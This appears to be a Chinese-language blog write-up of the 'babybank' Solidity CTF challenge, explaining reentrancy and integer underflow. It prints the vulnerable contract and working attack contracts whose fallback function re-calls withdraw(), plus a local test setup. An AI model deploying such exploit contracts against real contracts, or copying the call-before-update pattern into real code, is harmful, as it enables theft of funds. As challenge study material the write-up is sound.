<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8" />

    

    
    <title>LiuYi&#39;s BLog</title>
    
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
    <meta name="keywords" content="" />
    
    <meta name="description" content="Solidity重入攻击深入理解重入攻击漏洞代码1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374pragma solidity ^0.4.23;contract baby">
<meta property="og:type" content="article">
<meta property="og:title" content="LiuYi&#39;s BLog">
<meta property="og:url" content="https://xduly.github.io/2022/12/07/Solidity%E9%87%8D%E5%85%A5%E6%94%BB%E5%87%BB%E6%B7%B1%E5%85%A5%E7%90%86%E8%A7%A3/index.html">
<meta property="og:site_name" content="LiuYi&#39;s BLog">
<meta property="og:description" content="Solidity重入攻击深入理解重入攻击漏洞代码1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374pragma solidity ^0.4.23;contract baby">
<meta property="og:locale">
<meta property="article:published_time" content="2022-12-07T06:25:54.966Z">
<meta property="article:modified_time" content="2022-07-19T08:39:57.638Z">
<meta property="article:author" content="Liu Yi">
<meta name="twitter:card" content="summary">
    

    
        <link rel="alternate" href="/" title="LiuYi&#39;s BLog" type="application/atom+xml" />
    

    

    
<link rel="stylesheet" href="/libs/font-awesome/css/font-awesome.min.css">

    
<link rel="stylesheet" href="/libs/titillium-web/styles.css">

    
<link rel="stylesheet" href="/libs/source-code-pro/styles.css">


    
<link rel="stylesheet" href="/css/style.css">


    
<script src="/libs/jquery/3.5.0/jquery.min.js"></script>

    
    
        
<link rel="stylesheet" href="/libs/lightgallery/css/lightgallery.min.css">

    
    
        
<link rel="stylesheet" href="/libs/justified-gallery/justifiedGallery.min.css">

    
    
    
    


<meta name="generator" content="Hexo 6.3.0"></head>

<body>
    <div id="wrap">
        <header id="header">
    <div id="header-outer" class="outer">
        <div class="container">
            <div class="container-inner">
                <div id="header-title">
                    <h1 class="logo-wrap">
                        <a href="/" class="logo"></a>
                    </h1>
                    
                </div>
                <div id="header-inner" class="nav-container">
                    <a id="main-nav-toggle" class="nav-icon fa fa-bars"></a>
                    <div class="nav-container-inner">
                        <ul id="main-nav">
                            
                                <li class="main-nav-list-item" >
                                    <a class="main-nav-list-link" href="/">Inici</a>
                                </li>
                            
                                    
                                
                                <li class="main-nav-list-item" >
                                    <a class="main-nav-list-link" href="/about/index.html">Quant a</a>
                                </li>
                            
                        </ul>
                        <nav id="sub-nav">
                            <div id="search-form-wrap">

    <form class="search-form">
        <input type="text" class="ins-search-input search-form-input" placeholder="Cercar" />
        <button type="submit" class="search-form-submit"></button>
    </form>
    <div class="ins-search">
    <div class="ins-search-mask"></div>
    <div class="ins-search-container">
        <div class="ins-input-wrapper">
            <input type="text" class="ins-search-input" placeholder="Type something..." />
            <span class="ins-close ins-selectable"><i class="fa fa-times-circle"></i></span>
        </div>
        <div class="ins-section-wrapper">
            <div class="ins-section-container"></div>
        </div>
    </div>
</div>
<script>
(function (window) {
    var INSIGHT_CONFIG = {
        TRANSLATION: {
            POSTS: 'Posts',
            PAGES: 'Pages',
            CATEGORIES: 'categories',
            TAGS: 'etiquetes',
            UNTITLED: '(Untitled)',
        },
        ROOT_URL: '/',
        CONTENT_URL: '/content.json',
    };
    window.INSIGHT_CONFIG = INSIGHT_CONFIG;
})(window);
</script>

<script src="/js/insight.js"></script>


</div>
                        </nav>
                    </div>
                </div>
            </div>
        </div>
    </div>
</header>

        <div class="container">
            <div class="main-body container-inner">
                <div class="main-body-inner">
                    <section id="main">
                        <div class="main-body-header">
    <h1 class="header">
    
    Sense categoria
    </h1>
</div>

                        <div class="main-body-content">
                            <article id="post-Solidity重入攻击深入理解" class="article article-single article-type-post" itemscope itemprop="blogPost">
    <div class="article-inner">
        
        
            <div class="article-meta">
                
  <div class="article-date">
    <i class="fa fa-calendar"></i>
    <a href="/2022/12/07/Solidity%E9%87%8D%E5%85%A5%E6%94%BB%E5%87%BB%E6%B7%B1%E5%85%A5%E7%90%86%E8%A7%A3/" class="article-date">
       <time datetime="2022-12-07T06:25:54.966Z" itemprop="datePublished">2022-12-07</time>
    </a>
  </div>


<div class="article-date">
  <i class="fa fa-calendar-plus-o"></i>
  <a href="/2022/12/07/Solidity%E9%87%8D%E5%85%A5%E6%94%BB%E5%87%BB%E6%B7%B1%E5%85%A5%E7%90%86%E8%A7%A3/" class="article-date">
     <time datetime="2022-07-19T08:39:57.638Z" itemprop="dateModified">2022-07-19</time>
  </a>
</div>


                

                
                

                

            </div>
        
        
        <div class="article-entry" itemprop="articleBody">
            

            

            

            <h1 id="Solidity重入攻击深入理解"><a href="#Solidity重入攻击深入理解" class="headerlink" title="Solidity重入攻击深入理解"></a>Solidity重入攻击深入理解</h1><h2 id="重入攻击漏洞代码"><a href="#重入攻击漏洞代码" class="headerlink" title="重入攻击漏洞代码"></a>重入攻击漏洞代码</h2><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^<span class="number">0.4</span><span class="number">.23</span>;</span><br><span class="line"></span><br><span class="line">contract babybank <span class="punctuation">&#123;</span></span><br><span class="line">    mapping(address =&gt; uint) public level;<span class="comment">//奖励等级</span></span><br><span class="line">    mapping(address =&gt; uint) public balance;<span class="comment">//奖励点</span></span><br><span class="line">    address owner;<span class="comment">//当前合约调用者（智能合约）</span></span><br><span class="line">    uint secret;<span class="comment">//密码</span></span><br><span class="line">    </span><br><span class="line">    event sendflag(string md5ofteamtoken<span class="punctuation">,</span>string b64email); </span><br><span class="line">    </span><br><span class="line">    <span class="comment">//构造函数，初始化该合约的owner</span></span><br><span class="line">    constructor()public<span class="punctuation">&#123;</span></span><br><span class="line">        owner = msg.sender;</span><br><span class="line">    <span class="punctuation">&#125;</span></span><br><span class="line">    </span><br><span class="line">    <span class="comment">//pay for flag</span></span><br><span class="line">    function payforflag(string md5ofteamtoken<span class="punctuation">,</span>string b64email) public<span class="punctuation">&#123;</span></span><br><span class="line">        require(balance<span class="punctuation">[</span>msg.sender<span class="punctuation">]</span> &gt;= <span class="number">10000000000</span>);</span><br><span class="line">        balance<span class="punctuation">[</span>msg.sender<span class="punctuation">]</span>=<span class="number">0</span>;</span><br><span class="line">		<span class="comment">//transfer用于访问合约者向owner发送以太币</span></span><br><span class="line">		<span class="comment">//this指的是当前的访问者对象</span></span><br><span class="line">        owner.transfer(address(this).balance);</span><br><span class="line">        emit sendflag(md5ofteamtoken<span class="punctuation">,</span>b64email);</span><br><span class="line">    <span class="punctuation">&#125;</span></span><br><span class="line">    </span><br><span class="line">	<span class="comment">//modifier即函数的修改器，可以用来改变一个函数的行为，控制函数的逻辑。修改器是一种合约属性，可以被继承和重写。</span></span><br><span class="line">	<span class="comment">//下划线_是一个占位符，代表了执行函数接下来的代码。</span></span><br><span class="line">	<span class="comment">//定义了一个modifier onlyowner，用于限定具体的操作只有owner才能访问。</span></span><br><span class="line">    modifier onlyOwner()<span class="punctuation">&#123;</span></span><br><span class="line">        require(msg.sender == owner);</span><br><span class="line">        _;</span><br><span class="line">    <span class="punctuation">&#125;</span></span><br><span class="line">    </span><br><span class="line">    <span class="comment">//challenge 1 </span></span><br><span class="line">	<span class="comment">//profit()用于匹配账户地址，只有地址末位是0xb1b1的，才能获得奖励和层级提升。</span></span><br><span class="line">    function profit() public<span class="punctuation">&#123;</span></span><br><span class="line">        require(level<span class="punctuation">[</span>msg.sender<span class="punctuation">]</span>==<span class="number">0</span>);</span><br><span class="line">        require(uint(msg.sender) &amp; <span class="number">0xffff</span>==<span class="number">0xb1b1</span>);</span><br><span class="line">        balance<span class="punctuation">[</span>msg.sender<span class="punctuation">]</span>+=<span class="number">1</span>;</span><br><span class="line">        level<span class="punctuation">[</span>msg.sender<span class="punctuation">]</span>+=<span class="number">1</span>;</span><br><span class="line">    <span class="punctuation">&#125;</span></span><br><span class="line">    </span><br><span class="line">    <span class="comment">//challenge 2</span></span><br><span class="line">	<span class="comment">//set_secret()只能被合约的owner调用，用于设置或修改密码；</span></span><br><span class="line">    function set_secret(uint new_secret) public onlyOwner<span class="punctuation">&#123;</span></span><br><span class="line">        secret=new_secret;</span><br><span class="line">    <span class="punctuation">&#125;</span></span><br><span class="line">	<span class="comment">//guess()则为该合约的访问账户调用，如果猜对了owner设置的密码，且该账户的层级是1，就会获得奖励1，并层级跃迁一级。</span></span><br><span class="line">    function guess(uint guess_secret) public<span class="punctuation">&#123;</span></span><br><span class="line">        require(guess_secret==secret);</span><br><span class="line">        require(level<span class="punctuation">[</span>msg.sender<span class="punctuation">]</span>==<span class="number">1</span>);</span><br><span class="line">        balance<span class="punctuation">[</span>msg.sender<span class="punctuation">]</span>+=<span class="number">1</span>;</span><br><span class="line">        level<span class="punctuation">[</span>msg.sender<span class="punctuation">]</span>+=<span class="number">1</span>;</span><br><span class="line">    <span class="punctuation">&#125;</span></span><br><span class="line">    </span><br><span class="line">    <span class="comment">//challenge 3</span></span><br><span class="line">	<span class="comment">//transfer()在访问者账户里奖励数额够，且层级达到2的情况下，将2个奖励点，转给指定的其它账户</span></span><br><span class="line">    function transfer(address to<span class="punctuation">,</span> uint amount) public<span class="punctuation">&#123;</span></span><br><span class="line">        require(balance<span class="punctuation">[</span>msg.sender<span class="punctuation">]</span> &gt;= amount);</span><br><span class="line">        require(amount==<span class="number">2</span>);</span><br><span class="line">        require(level<span class="punctuation">[</span>msg.sender<span class="punctuation">]</span>==<span class="number">2</span>);</span><br><span class="line">        balance<span class="punctuation">[</span>msg.sender<span class="punctuation">]</span> = <span class="number">0</span>;</span><br><span class="line">        balance<span class="punctuation">[</span>to<span class="punctuation">]</span> = amount;</span><br><span class="line">    <span class="punctuation">&#125;</span></span><br><span class="line">	<span class="comment">//withdraw()从访问者账户抽取奖励点（amount是拥有的奖励点数）</span></span><br><span class="line">    function withdraw(uint amount) public<span class="punctuation">&#123;</span></span><br><span class="line">        require(amount==<span class="number">2</span>);</span><br><span class="line">        require(balance<span class="punctuation">[</span>msg.sender<span class="punctuation">]</span> &gt;= amount);</span><br><span class="line">		<span class="comment">//给当前合约调用者转账amount*100000000000000</span></span><br><span class="line">        msg.sender.call.value(amount*<span class="number">100000000000000</span>)();</span><br><span class="line">		<span class="comment">//当前合约调用者的奖励点-2</span></span><br><span class="line">        balance<span class="punctuation">[</span>msg.sender<span class="punctuation">]</span> -= amount;</span><br><span class="line">    <span class="punctuation">&#125;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>

<p>该合约的意义：访问合约的账户想要得到flag，但要确保其账户的奖励点要超过10000000000;但这些账户想要获得奖励点，就要通过三大挑战：</p>
<p>关键在于withdraw函数，他可能会触发以下两行：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">msg.sender.call.value(amount*100000000000000)();</span><br><span class="line">balance[msg.sender] -= amount;</span><br></pre></td></tr></table></figure>

<p>上一行导致重入攻击，下一行导致整形下溢出。</p>
<p>Solodity中的transfer()、send()、call.value()都可以用于向某一地址发送以太币。对比如下：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;address&gt;.transfer():当发送失败时，会通过“throw”回滚状态，只会传递2300个gas以供调用，从而防止重入</span><br><span class="line">&lt;address&gt;.send():当发送失败时，会返回布尔值false，只会传递2300个gas以供调用，从而防止重入</span><br><span class="line">&lt;address&gt;.call.value():当发送失败时，会返回布尔值false，会传递所有可用的gas进行调用，不能有效防止重入</span><br></pre></td></tr></table></figure>

<p>1.利用call调用引入的重入攻击：</p>
<ol>
<li>如果msg.sender本身就是一个合约的话，call调用在转账的时候会调用该合约的fallback函数。</li>
<li>这时候如果构造一个恶意的合约，在它的fallback函数里再次调用一次样例合约中的withdraw函数，这样就相当于调用了两次withdraw，经过了两次balance[msg.sender]-&#x3D;amount;</li>
<li>当然，在其fallback函数里，可以继续调用该withdraw函数，也可以在某种情况下中止调用（比如奖励够多）。</li>
</ol>
<p>2.整形下溢出攻击：</p>
<ol>
<li>转账的第一次可能2-2；</li>
<li>第二次0-2&#x3D;-2，实现整形下溢出，变成一个很大的数字，这样就可以实现balance[msg.sender]&gt;&#x3D;10000000000。</li>
</ol>
<h2 id="利用重入漏洞进行攻击的攻击合约代码："><a href="#利用重入漏洞进行攻击的攻击合约代码：" class="headerlink" title="利用重入漏洞进行攻击的攻击合约代码："></a>利用重入漏洞进行攻击的攻击合约代码：</h2><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^<span class="number">0.4</span><span class="number">.24</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">//attack合约需要和区块链上的其他的合约babybank会话，需先定义一个interface。</span></span><br><span class="line">interface BabybankInterface <span class="punctuation">&#123;</span></span><br><span class="line">    function withdraw(uint256 amount) external;<span class="comment">//从访问者账户抽取奖励点</span></span><br><span class="line">    function profit() external;<span class="comment">//匹配账户地址</span></span><br><span class="line">    function guess(uint256 number) external;<span class="comment">//作为访问账户，猜对了owner设置的密码，且该账户的层级是1，就会获得奖励1，并层级跃迁一级。</span></span><br><span class="line">    function transfer(address to<span class="punctuation">,</span> uint256 amount) external;<span class="comment">//如果访问者账户里奖励数额够&amp;层级达到2，就将2个奖励点，转给指定的其它账户</span></span><br><span class="line">    function payforflag(string md5ofteamtoken<span class="punctuation">,</span> string b64email) external;<span class="comment">//</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br><span class="line"></span><br><span class="line">contract attack <span class="punctuation">&#123;</span></span><br><span class="line">    <span class="comment">//private——只有合约中的其它函数才能够调用bank</span></span><br><span class="line">    BabybankInterface private bank = BabybankInterface(<span class="number">0x3E44E3d7Ecf4500179a132B8dD3FeC182Ed4a1F4</span>);<span class="comment">// ^ 这是babybank合约在以太坊上的地址，现在变量 `bank` 指向另一个合约对象babybank</span></span><br><span class="line">    bool flag = <span class="literal"><span class="keyword">false</span></span>;<span class="comment">//攻击合约是否拿到flag</span></span><br><span class="line"></span><br><span class="line">	<span class="comment">//fallback函数</span></span><br><span class="line">    function() external payable<span class="punctuation">&#123;</span></span><br><span class="line">        require(flag==<span class="literal"><span class="keyword">false</span></span>);</span><br><span class="line">        flag=<span class="literal"><span class="keyword">true</span></span>;<span class="comment">//更新flag状态</span></span><br><span class="line">        bank.withdraw(<span class="number">2</span>);<span class="comment">//bank的withdraw()函数从访问者账户（attack）中抽取奖励点（amount是拥有的奖励点数）</span></span><br><span class="line">    <span class="punctuation">&#125;</span></span><br><span class="line"></span><br><span class="line">    function att() public <span class="punctuation">&#123;</span></span><br><span class="line">        bank.withdraw(<span class="number">2</span>);</span><br><span class="line">    <span class="punctuation">&#125;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="具体攻击手法"><a href="#具体攻击手法" class="headerlink" title="具体攻击手法"></a>具体攻击手法</h2><p>利用末位地址为b1b1结尾的那个账号调用transfer函数，把2块钱转到我们这个攻击合约上。</p>
<p><strong>attack账户地址：</strong></p>
<p>0xAb8483F64d9C6d1EcF9b849Ae677dD331583<strong>5cb2</strong></p>
<p><strong>ReEntrancy合约调用者owner地址：</strong></p>
<p>0x4B20993Bc481177ec7E8f571ceCaE8A9e22C<strong>02db</strong></p>
<p><strong>ReEntrancy合约访问者地址：</strong></p>
<p>0x5B38Da6a701c568545dCfcB03FcB875f56be<strong>ddC4</strong></p>
<p>示例代码有问题，两个合约通过接口通信：</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^<span class="number">0.4</span><span class="number">.23</span>;</span><br><span class="line"></span><br><span class="line">interface BabybankInterface <span class="punctuation">&#123;</span></span><br><span class="line">    function withdraw(uint256 amount) external;</span><br><span class="line">    function profit() external;</span><br><span class="line">    function guess(uint256 number) external;</span><br><span class="line">    function transfer(address to<span class="punctuation">,</span> uint256 amount) external;</span><br><span class="line">    function payforflag(string md5ofteamtoken<span class="punctuation">,</span> string b64email);</span><br><span class="line"><span class="punctuation">&#125;</span></span><br><span class="line"></span><br><span class="line">contract babybank is BabybankInterface <span class="punctuation">&#123;</span></span><br><span class="line">    mapping(address =&gt; uint) public balance;</span><br><span class="line">    mapping(address =&gt; uint) public level;</span><br><span class="line">    address owner;</span><br><span class="line">    uint secret;</span><br><span class="line">    </span><br><span class="line">    <span class="comment">//Don&#x27;t leak your teamtoken plaintext!!! md5(teamtoken).hexdigest() is enough.</span></span><br><span class="line">    <span class="comment">//Gmail is ok. 163 and qq may have some problems.</span></span><br><span class="line">    event sendflag(string md5ofteamtoken<span class="punctuation">,</span>string b64email); </span><br><span class="line">    </span><br><span class="line">    </span><br><span class="line">    constructor()public<span class="punctuation">&#123;</span></span><br><span class="line">        owner = msg.sender;</span><br><span class="line">    <span class="punctuation">&#125;</span></span><br><span class="line">    </span><br><span class="line">    <span class="comment">//pay for flag</span></span><br><span class="line">    function payforflag(string md5ofteamtoken<span class="punctuation">,</span>string b64email) public<span class="punctuation">&#123;</span></span><br><span class="line">        require(balance<span class="punctuation">[</span>msg.sender<span class="punctuation">]</span> &gt;= <span class="number">10000000000</span>);</span><br><span class="line">        balance<span class="punctuation">[</span>msg.sender<span class="punctuation">]</span>=<span class="number">0</span>;</span><br><span class="line">        owner.transfer(address(this).balance);</span><br><span class="line">        emit sendflag(md5ofteamtoken<span class="punctuation">,</span>b64email);</span><br><span class="line">    <span class="punctuation">&#125;</span></span><br><span class="line">    </span><br><span class="line">    modifier onlyOwner()<span class="punctuation">&#123;</span></span><br><span class="line">        require(msg.sender == owner);</span><br><span class="line">        _;</span><br><span class="line">    <span class="punctuation">&#125;</span></span><br><span class="line">    </span><br><span class="line">    <span class="comment">//challenge 1 </span></span><br><span class="line">    function profit() public<span class="punctuation">&#123;</span></span><br><span class="line">        require(level<span class="punctuation">[</span>msg.sender<span class="punctuation">]</span>==<span class="number">0</span>);</span><br><span class="line">        require(uint(msg.sender) &amp; <span class="number">0xffff</span>==<span class="number">0xddC4</span>);</span><br><span class="line">        balance<span class="punctuation">[</span>msg.sender<span class="punctuation">]</span>+=<span class="number">1</span>;</span><br><span class="line">        level<span class="punctuation">[</span>msg.sender<span class="punctuation">]</span>+=<span class="number">1</span>;</span><br><span class="line">    <span class="punctuation">&#125;</span></span><br><span class="line">    </span><br><span class="line">    <span class="comment">//challenge 2</span></span><br><span class="line">    function set_secret(uint new_secret) public onlyOwner<span class="punctuation">&#123;</span></span><br><span class="line">        secret=new_secret;</span><br><span class="line">    <span class="punctuation">&#125;</span></span><br><span class="line">    function guess(uint guess_secret) public<span class="punctuation">&#123;</span></span><br><span class="line">        require(guess_secret==secret);</span><br><span class="line">        require(level<span class="punctuation">[</span>msg.sender<span class="punctuation">]</span>==<span class="number">1</span>);</span><br><span class="line">        balance<span class="punctuation">[</span>msg.sender<span class="punctuation">]</span>+=<span class="number">1</span>;</span><br><span class="line">        level<span class="punctuation">[</span>msg.sender<span class="punctuation">]</span>+=<span class="number">1</span>;</span><br><span class="line">    <span class="punctuation">&#125;</span></span><br><span class="line">    </span><br><span class="line">    <span class="comment">//challenge 3</span></span><br><span class="line">    function transfer(address to<span class="punctuation">,</span> uint amount) public<span class="punctuation">&#123;</span></span><br><span class="line">        require(balance<span class="punctuation">[</span>msg.sender<span class="punctuation">]</span> &gt;= amount);</span><br><span class="line">        require(amount==<span class="number">2</span>);</span><br><span class="line">        require(level<span class="punctuation">[</span>msg.sender<span class="punctuation">]</span>==<span class="number">2</span>);</span><br><span class="line">        balance<span class="punctuation">[</span>msg.sender<span class="punctuation">]</span> = <span class="number">0</span>;</span><br><span class="line">        balance<span class="punctuation">[</span>to<span class="punctuation">]</span> = amount;</span><br><span class="line">    <span class="punctuation">&#125;</span></span><br><span class="line">    </span><br><span class="line">    function withdraw(uint amount) public<span class="punctuation">&#123;</span></span><br><span class="line">        require(amount==<span class="number">2</span>);</span><br><span class="line">        require(balance<span class="punctuation">[</span>msg.sender<span class="punctuation">]</span> &gt;= amount);</span><br><span class="line">        msg.sender.call.value(amount*<span class="number">100000000000000</span>)();</span><br><span class="line">        balance<span class="punctuation">[</span>msg.sender<span class="punctuation">]</span> -= amount;</span><br><span class="line">    <span class="punctuation">&#125;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^<span class="number">0.4</span><span class="number">.24</span>;</span><br><span class="line"></span><br><span class="line">interface BabybankInterface <span class="punctuation">&#123;</span></span><br><span class="line">    function withdraw(uint256 amount) external;</span><br><span class="line">    function profit() external;</span><br><span class="line">    function guess(uint256 number) external;</span><br><span class="line">    function transfer(address to<span class="punctuation">,</span> uint256 amount) external;</span><br><span class="line">    function payforflag(string md5ofteamtoken<span class="punctuation">,</span> string b64email);</span><br><span class="line"><span class="punctuation">&#125;</span></span><br><span class="line"></span><br><span class="line">contract attack <span class="punctuation">&#123;</span></span><br><span class="line">    BabybankInterface private bank = BabybankInterface(<span class="number">0x4B20993Bc481177ec7E8f571ceCaE8A9e22C02db</span>);<span class="comment">//02db owner的地址</span></span><br><span class="line">    bool flag = <span class="literal"><span class="keyword">false</span></span>;</span><br><span class="line"></span><br><span class="line">    function() external payable<span class="punctuation">&#123;</span></span><br><span class="line">        require(flag==<span class="literal"><span class="keyword">false</span></span>);</span><br><span class="line">        flag=<span class="literal"><span class="keyword">true</span></span>;</span><br><span class="line">        bank.withdraw(<span class="number">2</span>);</span><br><span class="line">    <span class="punctuation">&#125;</span></span><br><span class="line">    function att() public <span class="punctuation">&#123;</span></span><br><span class="line">        bank.withdraw(<span class="number">2</span>);</span><br><span class="line">    <span class="punctuation">&#125;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>


        </div>
        <footer class="article-footer">
            



    <a data-url="https://xduly.github.io/2022/12/07/Solidity%E9%87%8D%E5%85%A5%E6%94%BB%E5%87%BB%E6%B7%B1%E5%85%A5%E7%90%86%E8%A7%A3/" data-id="clbkwm9ll000askon14zoauw7" class="article-share-link"><i class="fa fa-share"></i>Compartir</a>
<script>
    (function ($) {
        $('body').on('click', function() {
            $('.article-share-box.on').removeClass('on');
        }).on('click', '.article-share-link', function(e) {
            e.stopPropagation();

            var $this = $(this),
                url = $this.attr('data-url'),
                encodedUrl = encodeURIComponent(url),
                id = 'article-share-box-' + $this.attr('data-id'),
                offset = $this.offset(),
                box;

            if ($('#' + id).length) {
                box = $('#' + id);

                if (box.hasClass('on')){
                    box.removeClass('on');
                    return;
                }
            } else {
                var html = [
                    '<div id="' + id + '" class="article-share-box">',
                        '<input class="article-share-input" value="' + url + '">',
                        '<div class="article-share-links">',
                            '<a href="https://twitter.com/intent/tweet?url=' + encodedUrl + '" class="article-share-twitter" target="_blank" title="Twitter"></a>',
                            '<a href="https://www.facebook.com/sharer.php?u=' + encodedUrl + '" class="article-share-facebook" target="_blank" title="Facebook"></a>',
                            '<a href="http://pinterest.com/pin/create/button/?url=' + encodedUrl + '" class="article-share-pinterest" target="_blank" title="Pinterest"></a>',
                            '<a href="https://plus.google.com/share?url=' + encodedUrl + '" class="article-share-google" target="_blank" title="Google+"></a>',
                        '</div>',
                    '</div>'
                ].join('');

              box = $(html);

              $('body').append(box);
            }

            $('.article-share-box.on').hide();

            box.css({
                top: offset.top + 25,
                left: offset.left
            }).addClass('on');

        }).on('click', '.article-share-box', function (e) {
            e.stopPropagation();
        }).on('click', '.article-share-box-input', function () {
            $(this).select();
        }).on('click', '.article-share-box-link', function (e) {
            e.preventDefault();
            e.stopPropagation();

            window.open(this.href, 'article-share-box-window-' + Date.now(), 'width=500,height=450');
        });
    })(jQuery);
</script>

        </footer>
    </div>
    <script type="application/ld+json">
    {
        "@context": "https://schema.org",
        "@type": "BlogPosting",
        "author": {
            "@type": "Person",
            "name": "Liu Yi"
        },
        
        "image": "https://xduly.github.io",
        "keywords": "",
        "genre": "",
        "datePublished": "2022-12-07",
        "dateCreated": "2022-12-07",
        "dateModified": "2022-07-19",
        "url": "https://xduly.github.io/2022/12/07/Solidity重入攻击深入理解/",
        "description": "Solidity重入攻击深入理解重入攻击漏洞代码1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374pragma solidity ^0.4.23;contract baby",
        "wordCount": 1769
    }
</script>

</article>

    <section id="comments">
    
        
    <div id="disqus_thread">
        <noscript>Please enable JavaScript to view the <a target="_blank" rel="noopener" href="//disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
    </div>


    
    </section>



                        </div>
                    </section>
                    <aside id="sidebar">
    <a class="sidebar-toggle" title="Expand Sidebar"><i class="toggle icon"></i></a>
    <div class="sidebar-top">
        <p>seguir:</p>
        <ul class="social-links">
            
                
                <li>
                    <a class="social-tooltip" title="twitter" href="/" target="_blank" rel="noopener">
                        <i class="icon fa fa-twitter"></i>
                    </a>
                </li>
                
            
                
                <li>
                    <a class="social-tooltip" title="facebook" href="/" target="_blank" rel="noopener">
                        <i class="icon fa fa-facebook"></i>
